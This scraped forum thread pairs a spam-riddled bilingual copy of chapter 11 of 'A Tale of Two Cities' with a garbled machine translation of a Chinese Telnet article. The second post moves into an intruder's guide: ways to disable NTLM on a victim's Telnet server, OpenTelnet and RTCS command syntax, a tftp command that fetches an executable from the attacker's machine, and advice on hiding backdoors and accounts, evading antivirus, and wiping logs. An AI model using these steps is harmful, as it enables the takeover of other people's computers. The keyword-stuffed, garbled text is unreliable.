|
|
|
|
|
|
|
Your forum announcement here!
|
|
General Free Advertising Forums This is a list of general free advertising forums. Also referred to as free classfied ad forums. |
08-01-2011, 06:44 AM
|
#1
|
|
双城记(A Tale of Two Cities)第十一章 搭挡小像
`SYDNEY,' said Mr. Stryver, on that self-same night, or morning, 传奇私服, to his jackal; `mix another bowl of punch; I have something to say to you.'
Sydney had been working double tides that night, and the night before, and the night before that, and a good many nights in succession, making a grand clearance among Mr. Stryver's papers before the setting in of the long vacation. The clearance was effected at last; the Stryver arrears were handsomely fetched up; everything was got rid of until November should come with its fogs atmospheric and fogs legal, and bring grist to the mill again.
Sydney was none the livelier and none the soberer for so much application. It had taken a deal of extra wet-towelling to pull him through the night; a correspondingly extra quantity of wine had preceded the towelling; and he was in a very damaged condition, as he now pulled his turban off and threw it into the basin in which he had steeped it at intervals for the last six hours.
`Are you mixing that other bowl of punch?' said Stryver the portly, with his hands in his waistband, glancing round from the sofa where he lay on his back,
`I am.'
`Now, look here! I am going to tell you something that will rather surprise you, and that perhaps will make you think me not quite as shrewd as you usually do think me. I intend to marry.
`Do you?'
`Yes. And not for money. What do you say now?'
`I don't feel disposed to say much. Who is she?'
`Guess.'
`Do I know her?'
`Guess.'
`I am not going to guess, at five o'clock in the morning, with my brains frying and sputtering in my, head. If you want me to guess, you must ask me to dinner.
`Well then, I'll tell you,' said Stryver, coming slowly into a sitting posture. `Sydney, I rather despair of making myself intelligible to you, because you are such an insensible dog.'
`And you,' returned Sydney, busy concocting the punch, `are such a sensitive and poetical spirit.'
`Come!' rejoined Stryver, laughing boastfully, `though I don't prefer any claim to being the soul of Romance (for I hope I, know better), still I am a tenderer sort of fellow than you.
`You are a luckier, if you mean that.'
`I don't mean that. I mean I am a man of more--more---'
`Say gallantry, while you are about it,' suggested Carton.
`Well! I'll say gallantry. My meaning is that I am a man,' said Stryver, inflating himself at his friend as he made the punch, `who cares more to be agreeable, Who takes more pains to be agreeable, who knows better how to be agreeable, in a woman's society, than you do.'
`Go on,' said Sydney Carton.
`No; but before I go on,' said Stryver, shaking his head in his bullying way, `I'll have this out with you. You've been at Dr. Manette's house as much as I have, or more than I have. Why, I have been ashamed of your moroseness there! Your manners have been of that silent and sullen and hang-dog kind, that, upon my life and soul, I have been ashamed of you, Sydney!'
`It should be very beneficial to a man in your practice at the bar, to be ashamed of anything,' returned Sydney; `you ought to be much obliged to me.
`You shall not get off in that Way,' rejoined Stryver, shouldering the rejoinder at him; `no, Sydney, it's my duty to tell you--and I tell you to your face to do you good--that you are a devilish ill-conditioned fellow in that sort of society. You are a disagreeable fellow.'
Sydney drank a bumper of the punch he had made, and laughed.
`Look at me!' said Stryver, squaring himself: `I have less need to make myself agreeable than you have, being more independent in circumstances. Why do I do it?'
`I never saw you do it yet,' muttered Carton.
`I do it because it's politic; I do it on principle. And look at me! I get on.'
`You don't get on with your account of your matrimonial intentions,' answered Carton, with a careless air; `I wish you would keep to that. As to me--will you never understand that I am incorrigible?'
He asked the question with some appearance of scorn.
`You have no business to be incorrigible,' was his friend's answer, delivered in no very soothing tone.
`I have no business to be, at all, that I know of,' said Sydney Carton. `Who is the lady?'
`Now, don't let my announcement of the name make you uncomfortable, Sydney,' said Mr. Stryver, preparing him with ostentatious friendliness for the disclosure he was about to make, `because I know you don't mean half you say; and if you meant it all, it would be of no importance. I make this little preface, because,you once mentioned the young lady to me in slighting terms.
`I did?'
`Certainly; and in these chambers.'
Sydney Carton looked at his punch and looked at his complacent friend; drank his punch and looked at his complacent friend.
`You made mention of the young lady as a golden-haired doll. The young lady is Miss Manette. If you had been a fellow of any sensitiveness or delicacy of feeling in that kind of way, Sydney, I might have been a little resentful of your employing such a designation; but you are not. You want that sense altogether; therefore I am no more annoyed when I think of the expression, than I should be annoyed by a man's opinion of a picture of mine, who had no eye for pictures: or of a piece of music of mine, who had no ear for music.'
Sydney Carton drank the punch at a great rate; drank it by bumpers, looking at his friend.
`Now you know all about it, Syd,' said Mr. Stryver. `I don't care about fortune: she is a charming creature, and I have made up my mind to please myself: on the whole, I think I can afford to please myself. She will have in me a man already pretty well off and a rapidly rising man, and a man of some distinction: it is a piece of good fortune for her, but she is worthy of good fortune. Are you astonished?'
Carton, 传奇私服, still drinking the punch, rejoined, `Why should I be astonished?'
`You approve?'
Carton, still drinking the punch, rejoined, `Why should I not approve?' `Well!' said his friend Stryver, `you take it more easily than I fancied you would, and are less mercenary on my behalf than I thought you would be; though, to be sure, you know well enough by this time that your ancient chum is a man of a pretty strong will. Yes, Sydney, I have had enough of this style of life, with no other as a change iron' it; I feel that it is a pleasant thing for a man to have a home when he feels inclined to go to it (when he doesn't, he can stay away), and I feel that Miss Manette will tell well in any station, and will always do me credit. So I
have made up my mind. And now, Sydney, old boy, I want to say a word to you about your prospects. You are in a bad way, you know; you really are in a bad way. You don't know the value of money, you live hard, you'll knock up one of these days, and be ill and poor; you really ought to think about a nurse.
The prosperous patronage with which he said it, made him look twice as big as he was, and four times as offensive.
`Now, let me recommend you,' pursued Stryver, `to look it in the face. I have looked it in the face, in my different way; look it in the face, you, in your different way. Marry. Provide somebody to take care of you. Never mind your having no enjoyment of women's society, nor understanding of it, nor tact for it. Find out somebody. Find out some respectable woman with a little property--somebody in the landlady way, or lodging-letting way--and marry her, against a rainy day. That's the kind of thing for you. Now think of it, Sydney.'
`I'll think of it,' said Sydney.
“西德尼,”就在那天晚上或是次日凌晨,斯特莱佛先生对他的豺狗说,“再调一碗五味酒,我要告诉你一件事。 ”
那天晚上,前一天晚上,再前一天晚上和那以前的许多晚上西德尼都曾加班加点,要赶在大假日到来之前把斯特莱 佛的文件处理完毕。文件终于处理完毕了,斯特莱佛积压的工作全部漂漂亮亮告了个段落,只等着十一月份带着它 气象上的云雾和法律上的云雾,也带着送上门的业务到来。
西德尼用了多次冷敷,可精神仍然不好,头脑仍然不清。他是靠使用了大量的湿毛巾才熬过了这一夜的。在用湿毛 巾之前,还喝了与之相应的特别多的葡萄酒,直弄得心力交瘁。现在他拉下了那“大头巾”扔进盆子里。六个小时 以来他都不时在盆里浸毛巾。
“你在调另外一碗五味酒么?”大肚子的斯特莱佛两手插在腰带里,躺在沙发上, 传奇私服,眼睛瞟着他。
“是。”
“现在听着,我要告诉你一件令你颇为惊讶的事,你也许会说我并不如你所想象的那么精明:我想结婚 了。”
“你想?”
“是的。而且不是为了钱。现在你有什么意见?”
“我不想发表多少意见。对方是谁?”
“猜猜看。”
“我认识么?”
“猜猜看。”
“现在是早上五点钟,我的脑子像油煎一样噼噼啪啪乱响,我才不猜呢。要我猜,你得请我吃晚饭。”
“那好,那我就告评你,”斯特莱佛慢慢坐起身来说。“西德尼,我对自己相当失望,因为我不能让你理解我,因 为你是这样一个迟钝的笨蛋。”
“可你呢,”西德尼一边忙着调五味酒,一边回答,“你却是这样一个敏感而有诗意的精灵。”
“听着!”斯特莱佛回答,夸耀地笑着, 编辑推荐的文章,“我虽然不愿自命为罗曼斯的灵魂(因为我希望自己头脑更清醒),可总比你要温柔些,多情些。 ”
“你比我要幸运些,假如你是那意思的话。”
“我不是那意思。我的意思是我要更一—更——”
“更会献殷勤,只要你肯干,”卡尔顿提醒他。
“不错, 传奇私服!就说是会献殷勤吧。我的意思是我是个男子汉,”斯特莱佛在他朋友调酒时吹嘘起自己来,“我很愿在女人堆里 受人欢迎,而且很愿花功夫,也懂得怎样做。比你要强多了。”
“说下去,”西德尼.卡尔顿说。
“不,在我说下去之前,”斯特莱佛用他那居高临下的态度摇着头说,“我先得对你交代一句。你跟我一样常去曼 内特医生家,也许比我去得还多,可你在那儿总那么忧郁,我真替你难为情。你总像个一言不发、没精打采的受气 包,我以我的生命与灵魂发誓,我为你感到害躁,西德尼!”
“你也会感到害澡,这对像你这样的法庭工作人员倒是件大好事,”西德尼回答道,“你倒应该感谢我 呢!”
“可你也不能就这样溜掉,”斯特莱佛回答,话锋仍转向西德尼,“不,西德尼,我有义务告诉你——为了帮助你 ,我要当而告诉你,你跟那样的人来往的时候简直丢脸透了。你这人很不受欢迎呢!”
西德尼喝下一大杯自己调的五味酒,笑了。
“你看看我!”斯特莱佛挺挺胸膛,说,“我的条件使我更加独立,不像你那样需要受人欢迎。可我干吗还需要受 人欢迎呢?”
“我倒还没见过你受谁欢迎呢,”卡尔顿喃喃地说。
“我那样做是出于策略,出于原则。你看我, 我的愿望,蒸蒸日上。”
“你并不会因为谈起你的婚姻打算而蒸蒸日上的,”卡尔顿满不在乎地回答。“我希望你继续受人欢迎。至于我么 ——你难道永远也不明白我是无可救药的?”
他带着嘲讽的神气问道。
“你没有必要无可救药,”他的朋友回答,并没有带多少安慰的口气。
“我没有必要,这我明白,”西德尼.卡尔顿说,“你那位小姐是谁?”
“我宣布了名字你可别感到难为情,西德尼,”斯特莱佛先生说,他想让对方拿出友好的态度欢迎他就要宣布的心 事。“因为我知道你对自己说的话连一半也不当真,而且即使全部当真也并不重要,所以我就先来个小小的开场白 。你有一次曾在我面前说过藐视这位小姐的话。”
“真的?”
“肯定,而且就在这屋里。”
西德尼.卡尔顿望了望五味酒,望了望他那得意扬扬的朋友。他喝光了五味酒,又望了望他那得意扬 扬的朋友。
“那姑娘就是曼内特小姐,你曾说过她是个金发的布娃娃。如果你在这方面是个敏感细腻的人,西德尼,我对你那 种说法是会生气的。可你是个粗线条,完全缺少那种体会,因此我并不在乎,正如我不会在乎一个不懂画的人对我 的画发表的意见,或是一个不懂音乐的人对我的曲子发表意见一样。”
西德尼.卡尔顿迅速地喝着酒——望着他的朋友大口大口地喝着。
“现在你全知道了,西德尼,”斯特莱佛先生说,“我不在乎财产,她是个迷人的姑娘,我已下定了决心要让自己 快乐。总之,我认为我有条件让自己快乐。她嫁给我就是嫁给一个殷实富裕的人、一个迅速上升的人、一个颇有声 望的人:这对她是一种好运,而她又是配得上好运的。你大吃一惊了么?”
卡尔顿仍然喝着五味酒,回答道,“我为什么要大吃一惊?”
“你赞成么?”
卡尔顿仍然喝着五味酒,回答道,“我为什么要不赞成?”
“好!”他的朋友斯特莱佛说,“你比我估计的来得轻松,对我也不像我估计的那么唯利是图,尽管体现在无疑已 很懂得你这个老哥儿们是个意志坚强的人。是的,西德尼,我对现在这种生活方式已经受够了——想换个法儿活都 不行。我感到,要是想回家就有家可回是件挺快活的事(不想回去尽可以在外面呆着),而且我感到曼内特小姐在 任何情况下都挺有用处,能绘我增添光彩。因此我才下定了决心。现在,西德尼,老伙计,我要对你和你的前途说 几句。你知道你的处境不佳,的确不佳。你不懂得钱的重要。你日子过得辛苦, 传奇私服,不久就会遍体鳞伤,然后就是贫病交迫。你的确应当考虑找个保姆了。”
他说话时那副居高临下的神气使他看上去大了两倍,也使他可厌的程度大了四倍。
“现在,让我给你出个主意,”斯特莱佛接着说,“你得面对现实。我这人就面对现实,只是方式不同而已。你有 你的方式,你得面对现实。结婚吧!找个人来照顾你。你不喜欢跟女人交际,不懂得女人,也不会应付女人,别把 那当回事。找一个对象。找一个有点财产的正经女人——一个女老板,或是女房主什么的—一跟她结婚,来个未雨 绸缪。你只能这样。想想吧,西德尼。”
“我想想看,”西德尼说。
|
|
|
08-01-2011, 06:50 AM
|
#2
|
|
Telnet protocol is TCP / IP protocol suite, a member of the service is the Internet standard protocol for remote login and the main way. It provides users on the local computer's ability to complete the remote host. In the end user's computer using the telnet program, use it to connect to the server. End-user can enter commands in the telnet program, these commands will run on the server, just like in the server's console directly, enter the same. Can control at the local server. To start a telnet session, cheap chi straighteners, you must enter a user name and password to log in the server. Telnet is a common method of remote Web server.
directory
Introduction to the basic concepts of remote login process of the emergence and development of TeInet protocol 1, the basic content of 2 to adapt to heterogeneous 3, chi iron, 4 transmit remote commands, data flow 5, compulsory order 6, the election consultation services Win2000 the TeInet item basic configuration NTLMNTLM workflow is such a Telnet remote machine shows the case 1) authentication option = 0:02) authentication option = 1:03) authentication option = 2 in TeInet in What to Do 1. View system information 2. Use tftp to transfer files 3. rehousing the back door for the Internet's remote login TeInet TeInet Introduction to commonly used commands it was originally developed by the ARPANET, but now it is mainly used for Internet sessions. Its basic function is to allow users to log into remote host systems. At first, it just allows the user's local computer and remote computer is connected to a remote host for a terminal. Some of its newer version in the local implementation of more processing, so you can give a better response, and reduce the link sent to the remote host by the amount of information. Telnet application will not only facilitate our remote log, but also to provide another kind of hacker who invaded the means and the back door, but in any case, Telnet you enjoy the convenience brought to you at the same time, do you really know what Telnet ? Telnet remote login service, whilst also belongs to client / server model of service, but its greater significance lies in achieving an agreement based on Telnet remote login (remote interactive computing), then let us know about remote access. Let's look at the basic concepts of what is logged: time-sharing system allows multiple users to simultaneously use a computer, in order to ensure the security and accounting systems to facilitate the system requires that each user has a separate account as a login ID, the system for each users specify a password. Before using the system user ID and password to enter, a process known as the 'login'. Remote login is user Telnet command, so your computer temporarily become a simulation of the remote host end of the process. Terminal Emulation is equivalent to a non-intelligent machines, it is only responsible for passing user input to the host of each character, then the output of each of the host information echo on the screen. Emergence and development of ideas that we can be a provider of remote text editing service, the service's implementation requires a file to accept requests and data editing server and a client sends this request. Clients from the local machine will create a TCP connection to the server, of course, this requires the server's response, and then type the information sent to the server (file editing information), and read the output from the server. The above is a standard and ordinary client / server model of service. Seems to have client / server model of service, all problems can be solved remotely. But actually they are not as simple as you think, if we only need to edit files remotely, it just ideas of service fully capable, but if our demands are not so simple, we want to remote user management, remote data entry, remote system maintenance, to achieve everything achieved in the operation of the remote host, then we will need a lot of dedicated server program and services for each calculated using a server process, followed by the question: the remote machine will soon be overwhelmed the server process, and submerged in the sea of the process (here we exclude the most specialized remote machine). Is there a way to solve the problem? Of course, we can use Telnet to solve all this. We allow users to establish a remote login session on the machine, and then execute the command to achieve a more general service, the same as in the local operation. In this way, we can access all the available remote commands on the system and the system designer need not provide multiple dedicated to the server program. Matters came to a bright future here seems to, and use the remote login it always should solve the problem, but remote login is not simple. Not consider network design computer systems directly connected to the desired user only from the keyboard and display logged in to add this machine features a remote login the machine's operating system need to be modified, it is extremely difficult but also we try to avoid. We should therefore concentrate on the remote server, and software structure, although this is relatively difficult. Why do so is also more difficult? For example: In general, the operating system for some special meaning assigned special keys, such as the local system to 'Ctrl + C' be interpreted as: 'to terminate the command currently running process'. But suppose we have to run the remote login server software, 'Ctrl + C' also may not be transferred to the remote machine, if the client is really the 'Ctrl + C' spread to the remote machine, then the 'Ctrl + C' this command may not be able to terminate the local process, that is where it is likely to cause confusion. And this is just one of the problems encountered. However, despite technical difficulties, system programmers managed to construct most of the operating system can be used in a remote server, software, and is constructed to act as client applications. Usually, the client software, but one key to cancel all keys other than the local interpretation, and the local interpretation of the corresponding converted into remote interpretation, which makes the client software and the remote machine interaction, like sitting on the remote host As before, thus avoiding the confusion mentioned above. The only exception that the key that allows the user back to the local environment. Remote login server designed for application-level software, there is another requirement, that is, the operating system needs to provide to the pseudo-terminal (pseudo terminal) for their support. We describe the operating system, pseudo-terminal entry point, which allows the same program as the Telnet server to send characters to the operating system, and makes the character such as from the local keyboard. Only use this operating system can be designed for the remote server, and application-level software (such as the Telnet server software), otherwise, the local operating system and remote system will not recognize the transfer over the information transmitted from each other (because they can only be identified from the the keyboard of the type of local information), the remote login will be failed. Remote login server designed for application-level software despite its obvious advantages: the code embedded operating system than the easier to modify and control the server. But it also has the disadvantage of low efficiency (the contents will be explained later), have users type the information rate is not high, this design is acceptable. Work process using the Telnet protocol for remote login requires the following conditions: on the local computer must have the agreement contains the Telnet client; must know the remote host Ip address or domain name; must know the login ID and password. Telnet remote login services are divided into the following four processes: 1) to establish a connection between local and remote host. The process is actually to establish a TCP connection, the user must know the remote host Ip address or domain name; 2) will be entered on the local terminal user name and password and after enter any order or characters to NVT (Net Virtual Terminal) format to send to remote host. The process is actually a remote host from local host to send a IP packet; 3) the output of the remote host NVT format data into a format acceptable to the local back to local terminals, including input commands and command execution results echo; 4) Finally, the local terminal on the remote host to undo the connection. The process is the removal of a TCP connection. Discussed above, the contents of the remote login is only the most basic things, one of the complex and difficult programming staff is hard to imagine, do not know you're comfortable while using Telnet, if thought of that! TeInet Protocol Telnet server software we know is our most popular remote access server software, is a typical client / server model of service that apply Telnet protocol to work. So, what is the Telnet protocol? What features does it possess? 1, the basic content of Telnet protocol is TCP / IP protocol suite, a member of the service is the Internet standard protocol for remote login. Applications Telnet protocol that allows local users to use the computer into the remote host system, a terminal. It provides three basic services: 1) Telnet to define a Network Virtual Terminal for the remote system provides a standard interface. Client programs do not have to learn more about the remote system, they simply constructed using a standard interface procedures; 2) Telnet includes a client and server to allow option negotiation mechanism, and it provides a set of standard options;. 3) Telnet symmetrical at both ends of the connection handle, which does not force Telnet client input from the keyboard, not to force the client displayed on the screen output. 2, to adapt to multiple heterogeneous operating systems to make interaction between the Telnet be possible to have detailed understanding of heterogeneous computers and operating systems. For example, some operating systems require each line of text with ASCII carriage control characters (CR) end, some systems will need to use ASCII line feed (LF), there are some systems require a sequence of two characters carriage return - line feed (CR -LF); another example, most operating systems provide users with a shortcut key to run the interrupt, but the shortcut keys may be different in each system (some systems use CTRL + C, while other systems use ESCAPE). If you do not take into account the heterogeneity between systems, then issued in the local character or command sent to the remote system by remote interpretation is likely to be inaccurate or errors. Therefore, Telnet protocol must solve this problem. In order to adapt to heterogeneous environments, Telnet protocol defines the data and command transmission on the Internet, this definition is called the Network Virtual Terminal NVT (Net Virtual Terminal). Its application process is as follows: For sending the data: the client software key from the user terminal and the command sequences into NVT format, and sent to the server, the server software will receive data and commands, is far from NVT format the format required to the system; for the returned data: data from remote server remote machine format is converted to NVT format, and the local client will receive the NVT format data and then converted to local format. NVT format for the detailed definition of friends who are interested can go to find relevant information. 3, CHI Pink Dazzle Flat Iron, send remote commands we know that most operating systems provide a variety of shortcuts to achieve the appropriate control commands, when the user type in the local terminal, when these shortcuts, the local system performs the appropriate control commands, rather than the These shortcut keys as input. Then for Telnet, it is to achieve what the remote control command to send it? Telnet NVT also used to define how the control functions from the client will be sent to the server. We know USASCII character set includes 95 printable characters and 33 control codes. When the user type from the local ordinary characters, NVT will be sent in accordance with its original meaning; when the user types the shortcut key (combined key), NVT will transform it into a special ASCII characters sent over the network and reach the remote machine in its and converted into corresponding control commands. The normal ASCII character set and control commands distinguish reasons: 1) This distinction means that the Telnet greater flexibility: it can be sent between the client and server all possible ASCII characters and all control functions; 2) This distinction allows the client to specify unambiguous signaling and control functions will not produce confusion and general character. .4, Data flows mentioned above, we designed the Telnet application-level software has a drawback, that is: not very efficient. Why is this? The data given below Telnet flows: data typed by the user from the local keyboard and passed through the operating system, client program, the client program will return to the operating system after its processing by the operating system through the network to the remote machine, remote operating system will process the received data to the server and processed by the server program again returns to the operating system entry point on the pseudo-terminal, and finally, much to the operating system to transfer data to the user running the application, which will is a complete entry process; the output will follow the same path from the server to the client. Because every input and output, the computer will switch process environment several times, the cost is very expensive. Fortunately, the user's typing rate is not high, we are still able to accept this shortcoming. .5 Injunction that we should take into account such a situation: Suppose a local user of the remote machine is running an endless cycle of bad command or program, and the command or program has stopped reading the input, then the operating system buffer may thus be filled, and if so, then the remote server can not write data to pseudo-terminals, and ultimately to stop reading data from a TCP connection, TCP connection buffer will eventually be filled, resulting in block data flow into the connection. If these things really happened, then the local user will lose control of the remote machine. To solve this problem, Telnet protocol must be used to force the server to read the take-out signaling a control command. We know that TCP urgent data mechanism to achieve take-out with data signaling, then the Telnet is called as long as the data with an additional marker (date mark) the retention of eight groups, chi pink dazzle limited edition, and by allowing TCP to send data bits have been set up emergency notification segment server can, and carry emergency data segment will bypass the flow control directly to the server. As appropriate for emergency signaling, the server will read and discard all data until you find a data mark. Server in the face of the data marker will return to the normal process. 6, Telnet option negotiation at both ends of the machine and operating system heterogeneity, Telnet can not and should make strict rules of a telnet connection details for each configuration, chi pink dazzle hair straightener, otherwise it will greatly affect the adaptation Telnet heterogeneity. Therefore, Telnet option negotiation mechanism used to solve this problem. Telnet wide range of options: some options to expand the general direction of the function, and some of the options system involves some minor details. For example: there is an option to control the half-duplex or full-duplex Telnet is the mode (direction); there is an option to allow remote users on the machine determine the type of terminal server (small details). Telnet option negotiation is also very interesting, it is the treatment for each option are symmetrical, that is, negotiations may be issued either end applications; either end can accept or reject the application. In addition, if the other side do not know one end of the attempt to negotiate the option to accept the request of the end of the consultation can be simply rejected. Therefore, it is possible to newer, more complex client-server version of Telnet and older, less complex version of interaction. If the client and the server understand the new options, may have improved interaction. Otherwise, they will go with the less efficient way of working but can be run. All of these designs are adapted in order to enhance the heterogeneity of heterogeneity can be seen to adapt to their Telnet application and development of how important it is. Principle discussed above, some aspects of it, although we use the Telnet process is difficult to reach this level, but I think about these is meaningful, it will give us much enlightenment. Let us look at Win2000 the Telnet service. (Updated from time to time of the series, want to get the latest version, please visit the official website: Win2000 the TeInet food service community rookie basic configuration from the application level, in fact, Win2000 the Telnet service, and have nothing to say, most of what you can be obtained from the HELP file, I just want to tidy it just a little. Win2000 provides us with Telnet client and server programs: Telnet.exe is a client program (Client), tlntsvr.exe is a server program (server) , but it also provides us with Telnet server management program tlntadmn.exe. Windows 2000 Telnet service is installed by default, but not enabled by default. Here are a HELP file as part of the default Telnet service: AllowTrustedDomain: whether to allow domain users to access . The default value is 1, which allows users access to trusted domains. can be changed to 0: do not allow domain user access (only local users). DefaultDomain: You can have a trust relationship with the computer settings on any domain. The default value is. Telnet Server logon script path location. The default location is The default is 2. can have the following values: 0: do not use NTLM authentication. 1: first try to NTLM authentication, if that fails, chi turbo flat iron, then use the user name and password. 2: use only NTLM authentication. TelnetPort: show telnet server listens telnet port requests. Default is: 23. You can also change for other ports. the above setting you can use tlntadmn.exe (Telnet server management program) to be very easy configuration, configuration need to restart the Telnet service. If Figure 1NTLM telnet to mention that the NTLM, so I think this is the most headache thing an intruder, even if you get the administrator account and password, would simply not be easy by NTLM Moreover, the telnet default win2000 NTLM only way to verify identity, which we have to concern about this stuff NTLM, NTLM then what is it? SMB protocol early cleartext passwords on the network, and later appeared in referred to as the LM, it is very simple and very easy to be cracked as well, Microsoft subsequently submitted WindowsNT Challenge / Response authentication mechanism, the NTLM. now have newer NTLMv2 and Kerberos authentication system. NTLM workflow is such a 1, the client first Local encryption of the current user password as the password hash 2, the client sends to the server their account, this account is not encrypted, and expressly direct transmission 3, the server generates a 16-bit random number sent to the client, as a challenge (Challenge) 4, the client and then hash the encrypted password to encrypt the challenge, then this is returned to the server. as a response (response) 5, the server user name, to the client's challenge, which the client returns the response three things that sent the domain controller 6, the domain controller with the user name in the SAM database password management found in the user's password hash, and then use this password hash to encrypt the challenge. 7, compare the two encrypted domain controller challenge, if the same, then the authentication is successful. From the above process, we can see, NTLM is the identity the current user login to the Telnet server sends a request, rather than the sweep to the other side with your administrator account and password, it is clear , your login will fail. For example, your home machine called A (local machine), you called the invasion of the machine B (remote machine), A on your account is xinxin, the password is 1234, you sweep to B, the administrator account is Administrator, password is 5678, when you want to Telnet to the B,, NTLM automatically to the current user account and password as login credentials for operating the above seven, which uses xinxin and 1234, instead of using your brush to the Administrator and 5678, and these are done automatically, do not give you the opportunity to intervene, so your login will fail. Telnet remote machine shows the case of the Telnet server NTLM The use of three options, so when you Telnet remote machine is displayed in one of the following conditions: 1) authentication option = 0 =============== ====================== Microsoft (R) Windows (TM) Version 5.00 (Build 2195) Welcome to Microsoft Telnet Service Telnet Server Build 5.00.99201.1 login: password : 0 NTML authentication does not use, directly enter the user name and password, for example, you can enter a sweep to the Administrator and 56782) authentication option = 1 =============== ====================== NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password Microsoft (R) Windows (TM) Version 5.00 (Build 2195 ) Welcome to Microsoft Telnet Service Telnet Server Build 5.00.99201.1 login: password: first try NTLM authentication, if that fails, then use the user name and password, in fact, for us in this way, a way no different from the previous 3) Authentication option = 2 ===================================== NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password Server allows NTLM authentication only Server has closed connection Connection to host lost. C: > a closer look at the above shows that you did not enter a user name and password of the opportunity to directly disconnect the password is also a white sweep to sweep it is for the intruder, NTLM is a cross in front of us mountains, we must get rid of it, generally we have the following ways: 1 by modifying the remote telnet server configuration registry changes will be from 2 to verify the method 1 or 0; 2 uses NTLM.exe, upload directly after operation, telnet server authentication can be from 2 to 1; 3 scans to establish a local user, this user and open the telnet client for remote login; 4 software, such as opentelnet.exe (requires administrator privileges and open the IPC pipeline) 5 using a script, such as RTCS, (requires administrator privileges but do not rely on IPC channels) is basically above the 5 species, of which the latter two is the more common way to open telnet and very simple to use, the command is as follows : OpenTelnet.exe server username password NTLMAuthor telnetport OpenTelnet.exe server address of the administrator username and password authentication method (filling 0 or 1) telnet port cscript RTCS.vbe targetIP username password NTLMAuthor telnetport cscript RTCS.vbe
what to do in TeInet in the end would have wanted to write to the above, but many friends say telnet up after the do not know what to do, and being so, then I initiate it, the specific practices do not speak, just to talk about ideas, what? Why do not speak the specific approach? Of space Well, then I will explain one by one.
Telnet interface
1. view system information Oh, in fact, look everywhere to see if his system configuration and version (with a type c: boot.ini to know the pro version or server version), see to see what services are installed or software (from the directory name to be known), important or interesting to see what the file friends (Well, if the machine abroad, to see and can not read), take a look at his user situation Anyway, as much as possible understand the system, will install a back door thoroughly. 2. Use tftp to transfer files surely we've all been to transfer files in telnet, because we are used to pipe in the ipc file transfer, some friends like to use the net share ipc $ to open the pipe, then use copy to transmit file. But this rather troublesome, since we have been shell, we can use TFTP command to complete all of this, what is the TFTP it? Using TFTP (Trivial File Transfer Protocol) to achieve the file transfer is a file transfer based on UDP connections, generally using Windows built-tftp.exe and a TFTP server software is a complete transmission structure. It is used this way: first to run a local TFTP Server (for example tftpd32.exe) software and guaranteed to always open until the transfer completed, then telnet in (of course you can in the other shell) to run the following command: C: > tftp i ip get xinxin.exe c: abc xinxin.exe where the machine ip for your own ip, and upload files with the TFTP server in the same directory, so you can put on xinxin.exe abc directory reached c drive (in fact from the tftp server to download to a) the need to point out that, if using a proxy IP, you will not achieve the file transfer with the external network. Because of your data proxy gateway package when making your IP address will be added to the data reported in your place of your internal network addresses, so MAC address on the external network can not find you when it sets TFTP server. 3. Rehousing resettlement back door on the back door as early for the second step, if you invade other purposes, such as to destroy the main, or to modify the page, then these things can certainly be done before placement of the back door; if you just want a chicken, it would have nothing to say, the security door bar. The back door wide range, but also provides us with a great choice to choose the right under the specific circumstances of the back door is indeed a science. Generally have common back door: Trojan, asp Trojan, remote control software, clone accounts, create and hide account, telnet, telnet expansion shell, terminal services. Placement of the back door is usually a good note the following: (1) does not impede traffic by a firewall and killing: the virus database is added to the back door of the best packers to escape the firewall, as far as possible with low port traffic to avoid being blocked by a firewall . (2) to maximize concealment: If you choose a remote control software, pay attention to host the installation tips and small icons, and whether the Sync screen; If you are in the account on an issue, to try to keep both cmd, and user management no flaws; If you choose to put a trojan or telnet expansion, pay attention to the hidden files and processes; If you opened a new Terminal Services (not open before the invasion), must be conspicuous in the fall 3389 the port, and the lower the better . (3) Do When the administrator does not exist: it is a taboo, and many friends in the only default account created on a machine similar to 'hacking' of the administrator account, really 无知者无畏 Yeah. So placement of the back door, think of where the administrator will be where negligence. (4) dominate the broiler if you want to patch, patch will be necessary to know the competition of chickens is very intense. How to patch it? This also ask? Think about how you come to it. Well, reminder, in addition to repairing other big loophole (From the official patch and run), but also pay attention to its shared, ipc $ share (the best are closed), suspicious port, easy to use services. But also pay attention to hidden patches, do not let administrators found big changes. (5) clear the log manually or using software, if not it will find relevant teaching materials, I am not here described in detail. ================================================== ================================= +++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++ ================================== ================================================= TeInet Telnet for the Internet's remote login remote login for the Internet. It allows the user to sit on the computer keyboard has Internet access through the network to another computer has Internet access, so that they connected to each other. This connectivity can occur in computer inside the same room or in the context of the world have Internet access. habit of speaking, was connected computer, and for the provision of services to all users on the network computers known as servers (Server), while he said the machine in use of the client (Client). Once connected, the client can enjoy all the services provided by the server. Users can run the usual interaction (up to enter, execute the command), or go to a lot of special server, such as looking for book index . Internet hosts a variety of different services can be used. Telnet (telnet) (n.) A terminal emulation program for TCP / IP networks such as the Internet. The Telnet program runs on your computer and connects your PC to a server on the network. You can then enter commands through the Telnet program and they will be executed as if you were entering them directly on the server console. This enables you to control the server and communicate with other servers on the network. To start a Telnet session, you must log in to a server by entering a valid username and password. Telnet is a common way to remotely control Web servers. Telnet using Telnet command the easiest way is to type in the command line:% telnet remote-computer- name (or IP) using a UNIX system where the C shell, because the command option is a percent sign only some differences in details, but in essence is similar to, the following give a basic example of using Telnet: telnet porky.math. Trying 129.237.128.11 ... Connected to porky.math Escape character is'^]'. SunOS UNIX (porky) login: wl password: xxxxxxx Last Login: Tue Mar 28 05:35 from ns SunOS Release 4.1.3_U1 (SLIPPERY1) # 3: Sun Nov 20 23:47:23 CST 1999 No match. if: Expression syntax. porky / serv / wl% ls hello porky / serv / wl% porky / serv / wl% cd / porky /% ls Mail / dev / home / mnt / sbin / usr / News / domain / home1 / net / serv / var / Record / etc / kadb * pcfs / sys @ vmunix * bin @ export / lib @ print tmp / boot gofer / lost + found / record tmp_mnt / porky /% example above is called porky.math Telnet looking for a remote computer. After this computer is found, the Internet user's computer has become one of its terminals. At this time the dialogue screen appears with the user terminal connected to the same host. Users must register to enter (login) and the cancellation of launch (logout). In the login, you can give any orders for the remote system, because can be used. When the user exits from the remote system, will exit from Telnet, you can run your own local system. In fact, Telnet is a remote computer system can be registered into the tool. TeInet common command help followed by the online help open IP address or domain name for remote login close to the normal end of the remote session and return to command mode displays operating parameters display mode or character mode to enter line commands send to the remote host to send special characters (type send? can display more characters) set set operating parameters ( Type set? detailed parameters can be displayed) status change display status information toggle operating parameters (type toggle? detailed parameters can be displayed) ^] escape characters (escape character), [1] [2] in exceptional circumstances to exit 